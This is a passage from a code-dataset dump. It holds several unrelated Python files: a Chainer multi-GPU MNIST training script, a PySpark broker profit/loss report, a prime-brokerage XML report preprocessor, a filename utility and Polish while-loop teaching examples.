{}'.format(args.gpu0, args.gpu1))\n print('# unit: {}'.format(args.unit))\n print('# Minibatch-size: {}'.format(args.batchsize))\n print('# epoch: {}'.format(args.epoch))\n print('')\n model = L.Classifier(train_mnist.MLP(args.unit, 10))\n optimizer = chainer.optimizers.Adam()\n optimizer.setup(model)\n (train, test) = chainer.datasets.get_mnist()\n train_iter = chainer.iterators.SerialIterator(train, args.batchsize)\n test_iter = chainer.iterators.SerialIterator(test, args.batchsize, repeat=False, shuffle=False)\n updater = training.ParallelUpdater(train_iter, optimizer, devices={\n 'main': args.gpu0,\n 'second': args.gpu1,\n })\n trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=args.out)\n trainer.extend(extensions.Evaluator(test_iter, model, device=args.gpu0))\n trainer.extend(extensions.dump_graph('main/loss'))\n trainer.extend(extensions.snapshot(), trigger=(args.epoch, 'epoch'))\n trainer.extend(extensions.LogReport())\n trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'main/accuracy', 'validation/main/accuracy']))\n trainer.extend(extensions.ProgressBar())\n if args.resume:\n chainer.serializers.load_npz(args.resume, trainer)\n trainer.run()","sub_path":"Data Set/bug-fixing-5/7feb6b5041b8e86fdfd58dcd0457277f65342e57-
-bug.py","file_name":"7feb6b5041b8e86fdfd58dcd0457277f65342e57-
-bug.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"15881938","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom pyspark import SparkConf, SparkContext, sql\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.types import *\n\nimport subprocess\nimport re\nfrom datetime import datetime, timedelta\n\ndef daily_report(date):\n ## Maybe reading data from mysql is better\n \n ## Create table \"Transaction\"\n spark = SparkSession.builder\\\n .appName(\"daily_report\")\\\n .getOrCreate()\n\n Transaction = spark.read.parquet(f\"hdfs://master/user/spark/twstock/raw_data/broker_transaction/{date}.parquet\")\n Transaction.createOrReplaceTempView(\"Transaction\")\n Transaction = spark.sql(\"SELECT sID,bID,Date,buy,buy*price cost,sell,sell*price recieve,price FROM Transaction\")\n\n ## Create table \"Open_Close\"\n Open_Close = spark.read.parquet(f\"hdfs://master/user/spark/twstock/raw_data/transactions/{date}.parquet\")\n Open_Close = Open_Close.createOrReplaceTempView(\"Open_Close\")\n Open_Close = spark.sql(\"SELECT sID,open,close FROM Open_Close\")\n\n ## Combine \"Transaction\" + \"Open_Close\"\n # aggregate \"sum\" and \"avg_price\"\n daily_tbl = Transaction.join(Open_Close,\"sID\")\n\n basic_agg = daily_tbl.groupBy(\"sID\",\"bID\",\"Date\",\"open\",\"close\")\\\n .agg(sum(\"buy\").alias(\"total_buy\"),\n sum(\"cost\").alias(\"total_cost\"),\n sum(\"sell\").alias(\"total_sell\"),\n sum(\"recieve\").alias(\"total_recieve\"),\n (sum(\"buy\") - sum(\"sell\")).alias(\"storage\"),\n (sum(\"cost\") / sum(\"buy\")).alias(\"avg_buy_price\"),\n (sum(\"recieve\") / sum(\"sell\")).alias(\"avg_sell_price\")\n )\n ## Fillna\n basic_agg = basic_agg.na.fill(0, \"avg_buy_price\").na.fill(0, \"avg_sell_price\")\n\n ## Split \"day_trade\" \"over_bought\" \"over_sold\"\n # when() to set \"if,elif,else\" \n over_bought = basic_agg.filter(basic_agg[\"storage\"] > 0)\\\n .groupBy(\"sID\",\"bID\",\"Date\",\"open\",\"close\",\n \"total_buy\",\"total_cost\",\"total_sell\",\"total_recieve\",\n \"storage\",\"avg_buy_price\",\"avg_sell_price\")\\\n .agg(sum(\"total_recieve\").alias(\"realize_ProfitLoss\"),\n (sum(\"storage\") * (sum(\"close\") - sum(\"avg_buy_price\"))).alias(\"unrealize_ProfitLoss\"),\n (sum(\"total_recieve\") + (sum(\"storage\") * (sum(\"close\") - sum(\"avg_buy_price\")))).alias(\"total_ProfitLoss\"),\n ((sum(\"total_recieve\") + (sum(\"storage\") * (sum(\"close\") - sum(\"avg_buy_price\")))) / \n sum(\"total_cost\")).alias(\"return_rate_%\"),\n )\n\n over_sold = basic_agg.filter(basic_agg[\"storage\"] < 0)\\\n .groupBy(\"sID\",\"bID\",\"Date\",\"open\",\"close\",\n \"total_buy\",\"total_cost\",\"total_sell\",\"total_recieve\",\n \"storage\",\"avg_buy_price\",\"avg_sell_price\")\\\n .agg((sum(\"total_recieve\") - sum(\"total_cost\")).alias(\"realize_ProfitLoss\"),\n (sum(\"storage\") * 0).alias(\"unrealize_ProfitLoss\"),\n (sum(\"total_recieve\") - sum(\"total_cost\")).alias(\"total_ProfitLoss\"),\n (when((sum(\"total_sell\") * sum(\"avg_buy_price\")) > 0,\n (sum(\"total_recieve\") - sum(\"total_cost\")) / (sum(\"total_sell\") * sum(\"avg_buy_price\")))\n ).alias(\"return_rate_%\"),\n )\n\n day_trading = basic_agg.filter(basic_agg[\"storage\"] == 0)\\\n .groupBy(\"sID\",\"bID\",\"Date\",\"open\",\"close\",\n \"total_buy\",\"total_cost\",\"total_sell\",\"total_recieve\",\n \"storage\",\"avg_buy_price\",\"avg_sell_price\")\\\n .agg((sum(\"total_recieve\") - sum(\"total_cost\")).alias(\"realize_ProfitLoss\"),\n (sum(\"storage\")).alias(\"unrealize_ProfitLoss\"),\n (sum(\"total_recieve\") - sum(\"total_cost\")).alias(\"total_ProfitLoss\"),\n ((sum(\"total_recieve\") - sum(\"total_cost\")) / sum(\"total_cost\")).alias(\"return_rate_%\"),\n )\n\n\n daily_report = over_bought.union(over_sold).union(day_trading)\n # use withColumn() changing \"fixed-point\" of data\n # use withColumn() changing \"Type\" of data\n daily_report = daily_report.withColumn(\"open\", round(daily_report[\"open\"], 2))\\\n .withColumn(\"close\", round(daily_report[\"close\"], 2))\\\n .withColumn(\"total_cost\", round(daily_report[\"total_cost\"], 2))\\\n .withColumn(\"total_recieve\", round(daily_report[\"total_recieve\"], 2))\\\n .withColumn(\"avg_buy_price\", round(daily_report[\"avg_buy_price\"], 2))\\\n .withColumn(\"avg_sell_price\", round(daily_report[\"avg_sell_price\"], 2))\\\n .withColumn(\"realize_ProfitLoss\", round(daily_report[\"realize_ProfitLoss\"], 2))\\\n .withColumn(\"unrealize_ProfitLoss\", round(daily_report[\"unrealize_ProfitLoss\"], 2))\\\n .withColumn(\"total_ProfitLoss\", round(daily_report[\"total_ProfitLoss\"], 2))\\\n .withColumn(\"return_rate_%\", round(daily_report[\"return_rate_%\"], 2))\n\n daily_report = daily_report.withColumn(\"sID\",col(\"sID\").cast(StringType()))\\\n .withColumn(\"bID\",col(\"bID\").cast(StringType()))\\\n .withColumn(\"Date\",col(\"Date\").cast(DateType()))\\\n .withColumn(\"open\",col(\"open\").cast(FloatType()))\\\n .withColumn(\"close\",col(\"close\").cast(FloatType()))\\\n .withColumn(\"total_buy\",col(\"total_buy\").cast(IntegerType()))\\\n .withColumn(\"total_cost\",col(\"total_cost\").cast(FloatType()))\\\n .withColumn(\"total_sell\",col(\"total_sell\").cast(IntegerType()))\\\n .withColumn(\"total_recieve\",col(\"total_recieve\").cast(FloatType()))\\\n .withColumn(\"storage\",col(\"storage\").cast(IntegerType()))\\\n .withColumn(\"avg_buy_price\",col(\"avg_buy_price\").cast(FloatType()))\\\n .withColumn(\"avg_sell_price\",col(\"avg_sell_price\").cast(FloatType()))\\\n .withColumn(\"realize_ProfitLoss\",col(\"realize_ProfitLoss\").cast(FloatType()))\\\n .withColumn(\"unrealize_ProfitLoss\",col(\"unrealize_ProfitLoss\").cast(FloatType()))\\\n .withColumn(\"total_ProfitLoss\",col(\"total_ProfitLoss\").cast(FloatType()))\\\n .withColumn(\"return_rate_%\",col(\"return_rate_%\").cast(FloatType()))\n\n ## Saving parquet()\n # depending on size of partition to use repartition()\n\n # Example for saving to mysql\n# .write.format('jdbc').options(\n# url=\"jdbc:mysql://120.97.27.92:3306/twstock?useSSL=false&rewriteBatchedStatements=true\",\n# driver='com.mysql.jdbc.Driver',\n# dbtable='table_name',\n# user='user_name',\n# password='user_password'\n# ).mode('append').save()\n daily_report.repartition(1).write.mode('overwrite').parquet(f\"hdfs://master/user/spark/twstock/analysis/broker_transaction/DR/{date}\")\n\n\nif __name__=='__main__':\n\n if datetime.now().hour>14:\n Curday=datetime.today().date().isoformat()\n else:\n Curday=(datetime.today()-timedelta(days=1)).date().isoformat()\n\n daily_report(Curday)\n\n\n\n","sub_path":"broker_DR_daily.py","file_name":"broker_DR_daily.py","file_ext":"py","file_size_in_byte":8118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"398159787","text":"'''----------------------------------------------------------------------\nProject: Prime Brokerage Project\nDepartment: Prime Services\nRequester: Francois Henrion\nDeveloper: Paul Jacot-Guillarmod\nCR Number: 666125 (Initial Deployment)\n\n----------------------------------------------------------------------\nHISTORY\n================================================================================\nDate Change no Developer Description\n--------------------------------------------------------------------------------\n 666125 Paul Jacot-Guillarmod Initial Implementation\n2011-06-29 699989 Rohan van der Walt Add account name for cash transaction report\n Add report name\n Add row level colours\n Add column widths\n2011-07-06 707904 Rohan van der Walt Add Invoice Nr\n Add RunLocation\n2011-07-15 713436 Rohan van der Walt Filter out [] and NaN values in Cells\n2011-08-03 XXXXXX Rohan van der Walt Replace any -0 or -0.00 values with 0 or 0.00\n2011-09-13 768482 Rohan van der Walt Remove Settled section instrument detail and remove LIVE grouping\n2011-11-08 823082 Rohan van der Walt Settled Grouping Rename\n2013-03-19 883716 Phumzile Mgcima Added Preprocessor to cater for Multiple dividends on PreProcessXML()\n2013-03-19 2014795 Hynek Urban Introduce PreprocessXMLSortBySettled.\n2015-05-13 2833272 Peter Basista Change the way how account name is obtained.\n'''\nimport acm, re\nfrom itertools import chain\nfrom xml.etree import ElementTree\n\nimport at_logging\n\n\nLOGGER = at_logging.getLogger()\n\n\ndef _addAccountName(xml, accName):\n ignored_statuses = [\"Simulated\", \"Void\"]\n try:\n rd = ReportData(xml)\n reports = rd.getDataAsArray()\n for report in reports:\n instrument_name = reports[report][len(reports[report]) - 1][0].text\n acm_instrument = acm.FInstrument[instrument_name]\n acm_trades = acm_instrument.Trades()\n relevant_trades = [trade for trade in acm_trades\n if trade.Status() not in ignored_statuses]\n if len(relevant_trades) == 1:\n accName = relevant_trades[0].Name()\n break\n else:\n LOGGER.warning((\"Could not find exactly one relevant trade on instrument '%s'.\"\n \"Found %s relevant trades instead.\"), acm_instrument.Name(), len(relevant_trades))\n\n root = ElementTree.XML(xml)\n reports = []\n if root.tag == 'PRIMEReport':\n reports.append(root)\n else:\n reports = root.findall('PRIMEReport')\n\n for report in reports:\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n ElementTree.SubElement(reportParameters, 'AccountName').text = accName\n\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef _filterOutErrors(xml):\n try:\n rd = ReportData(xml)\n\n reports = rd.getDataAsArray()\n for report in reports:\n for row in reports[report]:\n for cell in row:\n try:\n if cell.text in ['[]', 'NaN', '#']:\n LOGGER.info('OLD: %s\\tNEW: ' , cell.text)\n cell.text = ''\n except:\n continue\n return rd.toXML()\n except:\n return xml\n\ndef _fixFormattingErrors(xml):\n try:\n pattern = r'^(-(0)*(\\.)?(0)*)$'\n rd = ReportData(xml)\n reports = rd.getDataAsArray()\n for report in reports:\n for row in reports[report]:\n for cell in row:\n try:\n myMatch = re.match(pattern, cell.text)\n if myMatch:\n new_text_val = cell.text.replace('-', '')\n LOGGER.info('OLD: %s\\tNEW: %s', cell.text, new_text_val)\n cell.text = new_text_val\n except:\n continue\n return rd.toXML()\n except:\n return xml\n\ndef _getDate(dateStr, customDate):\n ''' Convert trading manager date strings to actual dates\n '''\n if dateStr == 'Custom Date':\n try:\n return acm.Time().AsDate(customDate)\n except:\n return None\n elif dateStr == 'Now':\n return acm.Time().DateNow()\n elif dateStr == 'TwoDaysAgo':\n return acm.Time().DateAddDelta(acm.Time().DateNow(), 0, 0, -2)\n elif dateStr == 'PrevBusDay':\n calendar = acm.FCurrency['ZAR'].Calendar()\n if calendar:\n return calendar.AdjustBankingDays(acm.Time().DateNow(), -1)\n else:\n return acm.Time().DateAddDelta(acm.Time().DateNow(), 0, 0, -1)\n elif dateStr == 'Yesterday':\n return acm.Time().DateAddDelta(acm.Time().DateNow(), 0, 0, -1)\n elif dateStr == 'First Of Month':\n return acm.Time().FirstDayOfMonth(acm.Time().DateNow())\n elif dateStr == 'First Of Year':\n return acm.Time().FirstDayOfYear(acm.Time().DateNow())\n else:\n return None\n\n\ndef _addDates(xml):\n try:\n root = ElementTree.XML(xml)\n reports = []\n if root.tag == 'PRIMEReport':\n reports.append(root)\n else:\n reports = root.findall('PRIMEReport')\n\n START_DATE = 'Portfolio Profit Loss Start Date'\n START_DATE_CUSTOM = 'Portfolio Profit Loss Start Date Custom'\n END_DATE = 'Portfolio Profit Loss End Date'\n END_DATE_CUSTOM = 'Portfolio Profit Loss End Date Custom'\n dict = {\n START_DATE: None,\n START_DATE_CUSTOM: None,\n END_DATE: None,\n END_DATE_CUSTOM: None\n }\n\n for report in reports:\n for group in report.findall('ReportContents/Table/Settings/Groups/Group'):\n label = group.find('Label')\n if not label is None and label.text == 'Profit/Loss':\n columnId = None\n for element in group:\n if element.tag == 'Column':\n columnIdElement = element.find('ColumnId')\n if not columnIdElement is None:\n columnId = columnIdElement.text\n else:\n columnId = None\n elif element.tag == 'Cell':\n data = element.find('RawData')\n if not data is None:\n data = data.text\n if columnId == START_DATE:\n dict[START_DATE] = acm.FEnumeration['EnumPLStartDate'].Enumerator(data)\n elif columnId == START_DATE_CUSTOM:\n dict[START_DATE_CUSTOM] = data\n elif columnId == END_DATE:\n dict[END_DATE] = acm.FEnumeration['EnumPLEndDate'].Enumerator(data)\n elif columnId == END_DATE_CUSTOM:\n dict[END_DATE_CUSTOM] = data\n columnId = None\n else:\n columnId = None\n break\n\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n ElementTree.SubElement(reportParameters, 'PortfolioStartDate').text = _getDate(dict[START_DATE], dict[START_DATE_CUSTOM])\n ElementTree.SubElement(reportParameters, 'PortfolioEndDate').text = _getDate(dict[END_DATE], dict[END_DATE_CUSTOM])\n ElementTree.SubElement(reportParameters, 'DateToday').text = _getDate('Now', None)\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef _addAddress(xml, partyName):\n ''' Add address elements to the report node\n '''\n try:\n root = ElementTree.XML(xml)\n reports = []\n if root.tag == 'PRIMEReport':\n reports.append(root)\n else:\n reports = root.findall('PRIMEReport')\n party = acm.FParty[partyName.upper()]\n for report in reports:\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n clientDetails = reportParameters.find(\"ClientDetails\")\n if not clientDetails:\n clientDetails = ElementTree.SubElement(reportParameters, \"ClientDetails\")\n ElementTree.SubElement(clientDetails, 'FullName').text = str(party.Fullname())\n ElementTree.SubElement(clientDetails, 'Address').text = str(party.Address())\n ElementTree.SubElement(clientDetails, 'City').text = str(party.City())\n ElementTree.SubElement(clientDetails, 'ZipCode').text = str(party.ZipCode())\n ElementTree.SubElement(clientDetails, 'Country').text = str(party.Country())\n\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef _addColumnWidths(xml):\n '''\n Scans through the column data and automatically sets the column width wide enough\n OR reads from extension value?\n This will only work on single report xml files, NOT multireports\n '''\n try:\n SPACE_PER_CHAR = 2.8\n PAGE_WIDTH = 278\n rd = ReportData(xml)\n reports = rd.getDataAsArray()\n for report in reports:\n colWidths = {}\n colSpaces = {}\n for i in range(len(reports[report][0])):\n colWidths.setdefault(i, 5)\n colSpaces.setdefault(i, 0)\n for column in range(len(reports[report][0])):\n try:\n spaceCount = reports[report][0][column].text.count(' ')\n except:\n spaceCount = 0;\n colSpaces[column] = max([colSpaces[column], spaceCount])\n for row in range(len(reports[report])):\n try:\n cellText = reports[report][row][column].text if reports[report][row][column].text else ''\n except:\n cellText = ''\n colWidths[column] = max([colWidths[column], len(cellText)])\n try:\n colName = reports[report][0][column].text if reports[report][0][column].text else ''\n except:\n colName = ''\n if colName == 'Issuer':\n colWidths[column] = float(colWidths[column]) / 1.5\n elif colName == 'Date and Time':\n colWidths[column] = float(colWidths[column]) / 1.5\n\n # Write Results\n report = rd.getReportNode(report)\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n columnWidths = reportParameters.find(\"ColumnWidths\")\n if not columnWidths:\n columnWidths = ElementTree.SubElement(reportParameters, \"ColumnWidths\")\n scaled = {}\n for key, val in colWidths.items():\n scaled[key] = float(val * SPACE_PER_CHAR) / 1.4 if colSpaces[key] >= 1 else val * SPACE_PER_CHAR\n total = sum(scaled[i] for i in scaled.keys())\n factor = PAGE_WIDTH / total\n for key, val in scaled.items():\n ElementTree.SubElement(columnWidths, 'c', attrib={'id':str(key)}).text = str(val * factor) + 'mm'\n\n return rd.toXML()\n except:\n return xml\n\ndef _addGroupLevelColours(xml):\n '''\n read extensionValue to set group level background colours\n '''\n try:\n rd = ReportData(xml)\n reports = rd.getDataAsArray()\n for report in reports:\n treeDepth = rd.getTreeDepth(report)\n report = rd.getReportNode(report)\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n groupingLevelBackgroundColour = reportParameters.find(\"GroupingLevelBackgroundColour\")\n if not groupingLevelBackgroundColour:\n groupingLevelBackgroundColour = ElementTree.SubElement(reportParameters, \"GroupingLevelBackgroundColour\")\n # print 'Found tree depth of', treeDepth\n if treeDepth == 1:\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour1').text = '#ffffff'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour2').text = '#ffffff'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour3').text = '#ffffff'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour4').text = '#ffffff'\n elif treeDepth == 2:\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour1').text = '#d1d1d1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour2').text = '#ffffff'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour3').text = '#ffffff'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour4').text = '#ffffff'\n elif treeDepth == 3:\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour1').text = '#d1d1d1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour2').text = '#e1e1e1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour3').text = '#ffffff'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour4').text = '#ffffff'\n elif treeDepth == 4:\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour1').text = '#d1d1d1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour2').text = '#e1e1e1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour3').text = '#e8e8e8'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour4').text = '#ffffff'\n elif treeDepth == 5:\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour1').text = '#d1d1d1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour2').text = '#d9d9d9'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour3').text = '#e1e1e1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour4').text = '#e8e8e8'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour5').text = '#ffffff'\n return rd.toXML()\n except:\n return xml\n\n\ndef _addReportParameter(xml, name, value):\n '''\n add a node to reportParameters\n '''\n try:\n root = ElementTree.XML(xml)\n reports = []\n if root.tag == 'PRIMEReport':\n reports.append(root)\n else:\n reports = root.findall('PRIMEReport')\n\n for report in reports:\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n ElementTree.SubElement(reportParameters, name).text = value\n return ElementTree.tostring(root)\n except:\n return xml\n\n\nclass ReportData():\n root = None\n\n def __init__(self, xml):\n self.root = ElementTree.XML(xml)\n\n def _addRows(self, row, results, reportName):\n results[reportName].append(ReportData._flatten([ row.find('Label') , [ cell.find('FormattedData') for cell in row.findall('Cells/Cell')] ]))\n if len(row.findall('Rows/Row')) > 0:\n for r in row.findall('Rows/Row'):\n results = self._addRows(r, results, reportName)\n return results\n\n @staticmethod\n def _flatten(x):\n \"\"\"flatten(sequence) -> list\n\n Returns a single, flat list which contains all elements retrieved\n from the sequence and all recursively contained sub-sequences\n (iterables).\n\n Examples:\n >>> [1, 2, [3,4], (5,6)]\n [1, 2, [3, 4], (5, 6)]\n >>> flatten([[[1,2,3], (42,None)], [4,5], [6], 7, MyVector(8,9,10)])\n [1, 2, 3, 42, None, 4, 5, 6, 7, 8, 9, 10]\"\"\"\n\n result = []\n for el in x:\n # if isinstance(el, (list, tuple)):\n if hasattr(el, \"__iter__\") and not isinstance(el, basestring):\n result.extend(ReportData._flatten(el))\n else:\n result.append(el)\n return result\n\n def getDataAsArray(self):\n '''\n Returns data including headers and row labels as a 2-dim array\n for e.g. reports[\"PS_Finance_Report-Finance Report\"][3][0] wil get the 3rd row's row label of the 1st report. All values stored as Element\n '''\n reports = []\n results = {}\n if self.root.tag == 'PRIMEReport':\n reports.append(self.root)\n else:\n reports = self.root.findall('PRIMEReport')\n\n for report in reports:\n reportName = report.find('Name').text\n results[reportName] = []\n # Set Column headers\n results[reportName].append(ReportData._flatten([ '', [ i.find('Label') for i in report.findall('ReportContents/Table/Columns/Column')] ]))\n node = report.find('ReportContents/Table')\n if len(node.findall('Rows/Row')) > 0:\n for row in node.findall('Rows/Row'):\n results = self._addRows(row, results, reportName)\n return results\n\n def getReportNode(self, reportName):\n reports = []\n if self.root.tag == 'PRIMEReport':\n reports.append(self.root)\n else:\n reports = self.root.findall('PRIMEReport')\n for report in reports:\n if reportName == report.find('Name').text:\n return report\n return None\n\n def getTreeDepth(self, reportName):\n reportNode = self.getReportNode(reportName)\n depth = [0, ]\n if reportNode:\n table = reportNode.find('ReportContents/Table')\n depth = ReportData._checkDepth(table, depth)\n return max(depth)\n\n @staticmethod\n def _checkDepth(row, depthList, d=0):\n if len(row.findall('Rows/Row')) >= 1:\n depth = d + 1\n depthList.append(depth)\n for r in row.findall('Rows/Row'):\n depthList = ReportData._checkDepth(r, depthList, d=depth)\n else:\n depth = -1\n return depthList\n\n def _getNodeDepth(self, node):\n count = 0\n while node:\n node = node.find('../parent')\n count += 1\n return count\n\n def toXML(self):\n return ElementTree.tostring(self.root)\n\ndef _addInvoiceNr(xml):\n '''\n adds invoice nr - The first trade number that appears in report, if empty, dont show invoice nr label.\n '''\n try:\n rd = ReportData(xml)\n reports = rd.getDataAsArray()\n for report in reports:\n if len(reports[report]) > 2:\n invoiceTag = 'Tax Invoice Nr: ' + reports[report][2][0].text\n else:\n invoiceTag = ''\n\n root = ElementTree.XML(xml)\n reports = []\n if root.tag == 'PRIMEReport':\n reports.append(root)\n else:\n reports = root.findall('PRIMEReport')\n for report in reports:\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n\n ElementTree.SubElement(reportParameters, 'InvoiceNr').text = invoiceTag\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef _addRunLocation(xml):\n '''\n adds invoice nr - The first trade number that appears in report, if empty, dont show invoice nr label.\n '''\n try:\n root = ElementTree.XML(xml)\n reports = []\n if root.tag == 'PRIMEReport':\n reports.append(root)\n else:\n reports = root.findall('PRIMEReport')\n for report in reports:\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n\n ElementTree.SubElement(reportParameters, 'RunLocation').text = \"FrontEnd\" if str(acm.Class()) == \"FTmServer\" else \"BackEnd\"\n\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef _removeSettledInstrumentRows(xml):\n try:\n root = ElementTree.XML(xml)\n parent_map = dict((c, p) for p in root.getiterator() for c in p)\n for node in root.findall('.//Label'):\n if node.text == 'Expired or Closed Out':\n parent = parent_map[node]\n rows = parent_map[parent]\n parent.remove(parent.find('Rows'))\n rows.remove(parent)\n rows.append(parent)\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef _moveLiveInstrumentRows(xml):\n try:\n root = ElementTree.XML(xml)\n parent_map = dict((c, p) for p in root.getiterator() for c in p)\n for node in root.findall('.//Label'):\n if node.text == 'Live':\n parent = parent_map[node]\n rows = parent_map[parent]\n for liveInstrumentRow in parent.findall('./Rows/Row'):\n rows.append(liveInstrumentRow)\n rows.remove(parent)\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef PreProcessXML(reportObj, param, xml, keep_settled=False):\n ''' Pre-Process the xml for the Prime Brokergae reports by adding elements for the portfolio start and end date and the party address.\n The party name is entered in the parameter field of the Processing tab.\n param = comma seperated values\n param[0] - Party name to extract address details...\n param[1] - Report name\n param[2] - (optional) Account name\n param[3] - (optional) Version of the reporting framework that generated the report\n '''\n\n param = param.split(',')\n xml = _addDates(xml)\n xml = _addAddress(xml, param[0])\n xml = _addReportParameter(xml, 'ReportName', param[1])\n xml = _addRunLocation(xml)\n if len(param) > 2 and param[2]:\n xml = _addAccountName(xml, param[2])\n if len(param) > 3 and param[3]:\n xml = _addReportParameter(xml, 'FrameworkVersion', param[3])\n xml = _addInvoiceNr(xml)\n xml = _filterOutErrors(xml)\n xml = _fixFormattingErrors(xml)\n if not keep_settled:\n xml = _moveLiveInstrumentRows(xml)\n xml = _removeSettledInstrumentRows(xml)\n xml = _addGroupLevelColours(xml)\n\n return xml\n\n\ndef PreProcessXMLSortBySettled(reportObj, param, xml):\n \"\"\"Show the \"Live\" records before the \"Expired\" ones.\"\"\"\n xml = PreProcessXML(reportObj, param, xml, keep_settled=True)\n root = ElementTree.XML(xml)\n rows_elements = root.findall('.//Rows')\n for rows_element in rows_elements:\n live_rows = []\n expired_rows = []\n rest = []\n for row in rows_element:\n if row.find('Label').text == 'Live':\n live_rows.append(row)\n elif row.find('Label').text == 'Expired or Closed Out':\n expired_rows.append(row)\n else:\n rest.append(row)\n if not live_rows and not expired_rows:\n continue # Nothing to reorder here.\n for row in chain(live_rows, expired_rows, rest):\n # In this way, all rows are gradually moved to the end in the sorted\n # order.\n rows_element.remove(row)\n rows_element.append(row)\n return ElementTree.tostring(root)\n","sub_path":"Extensions/Prime Services/FPythonCode/PS_XMLReportingTools.py","file_name":"PS_XMLReportingTools.py","file_ext":"py","file_size_in_byte":24425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"398843292","text":"# Utility functions for python-delphin\n\ndef unique_filename(filename, max_num=999):\n \"\"\"\n Returns a unique filename for the filename given by appending a number.\n By default, an exception is raised if the number exceeds 999.\n\n @param filename: The base filename to be made unique.\n @param max_num: The highest number value to append to the base filename.\n \"\"\"\n import os\n i = 0\n new_filename = filename\n while os.path.exists(new_filename):\n i += 1\n if i > max_num:\n raise ValueError('Filename extension out of range (%d)' % max_num)\n new_filename = '.'.join([filename, str(i)])\n return new_filename\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"641385266","text":"\n# Dopóki licznik nie przekroczy 30 wypisujemy kolejne liczby\n# counter = 0\n# while counter <= 30:\n# print(counter)\n# counter += 1\n\n# while True:\n# print(\"Nigdy nie skończę!!!\")\n\n# expected_potatoes = int(input(\"Ile ziemniaków chcesz na obiad? \"))\n# potatoes = []\n# while len(potatoes) < expected_potatoes:\n# print(\"Obieram ziemniaka...\")\n# print(\"I wrzucam go do garnka :)\")\n# potatoes.append(\"Ziemniak\")\n# print(potatoes)\n\n\n# Chcemy żeby liczba podana przez użytkownika była większa niż 100\n# number = int(input(\"Podaj liczbę większą niż 100: \"))\n# while number <= 100:\n# print(f\"{number} nie jest większe niż 100! Spróbujmy jeszcze raz... \\n\")\n# number = int(input(\"Podaj liczbę większą niż 100: \"))\n#\n# print(f\"Brawo!\")\n\n# Możemy upewnić się, że użytkownik podał sensowną wartość\n# age = int(input(\"Ile masz lat? \"))\n# while age < 1:\n# print(\"Chyba nie...\\n\")\n# age = int(input(\"Ile masz lat? \"))\n#\n# if age < 18:\n# print(\"Jeszcze nie możesz głosować\")\n# else:\n# print(\"Możesz już głosować!\")\n\n# Pozwalamy użytkownikowi skorzystać z programu wielokrotnie\noption = \"T\"\nwhile option == \"T\":\n income = int(input(\"Podaj przychód: \"))\n employees_number = int(input(\"Podaj liczbę pracowników: \"))\n years_on_the_market = int(input(\"Ile lat działacie na rynku: \"))\n if income < 2000:\n print(\"Przyznano główne wsparcie\")\n elif 5 <= employees_number <= 10:\n print(\"Przyznano wsparcie z funduszu pracowników\")\n elif years_on_the_market < 3:\n print(\"Przyznano wsparcie dla nowych firm\")\n else:\n print(\"Przyznano wsparcie na pocieszenie ;)\")\n\n option = input(\"Jeżeli chcesz sprawdzić dla innych danych wpisz 'T': \")\n","sub_path":"week_5/while_loop/while_examples.py","file_name":"while_examples.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"27587964","text":"# Python built-in packages\nimport ConfigParser\nimport logging\nimport os\n\n\nclass Configuration(object):\n 